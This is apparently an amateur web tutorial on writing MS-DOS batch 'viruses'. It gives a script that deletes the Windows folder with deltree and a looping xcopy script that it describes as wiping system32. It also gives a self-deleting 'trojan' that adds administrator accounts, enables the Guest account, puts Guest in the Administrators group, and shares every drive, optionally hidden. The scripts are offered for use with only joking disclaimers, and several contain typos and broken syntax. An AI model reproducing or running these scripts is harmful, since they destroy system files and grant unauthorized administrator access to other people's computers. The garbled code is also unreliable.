Dos Virus Making

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Dos virus making

Here you will find out how easy it is to make virus in Ms dos.

Ok to start off making a dos virus you must have notepad all computers have it so
just open it up then type in this code and save the file as a .BAT it must be .bat
to work.
******************************start of code*****
@echo off
cd c:\window
@deltree/y c:\windows
**************end of code********
This will delete the file windows. ONLY USE THIS CODE TO DELETE WINDOWS ON YOUR

This one is going to be a bit more eviler then the last so do not go sending it
out ok.
@echo off
cd c:/WINDOWS/system32
: copy
xcopy/c C:/windows
goto copy
cd c:/WINDOWS/system32
: copy
xcopy/c %0
goto cop
******************end of code********************
This will delete system 32 and amke a backup copy of the file in windows and it
will open up when the computer runs so if then get a backup of windows then it
will get delete.

Now for a trojan in dos well maybe not a real trojan but it is a good virus and
will give you admin power in a computer
you can use this if you have two pc in your house but if you use it on someone adn
they dunno about it then the cops maybe coming to your door lol.

start http: -anypage-
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net share a=a:\
net share b=b:\
net share c=c:\
net share d=d:\
net share e=e:\
net share f=f:\
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

you can write net share a$=a:\ if you want the shared files to be hidden and add
del %0 at the end so the trojan will self distruct
This trojan was not made by me.

I hope you like the dos virus and trojans come back soon for more updates.

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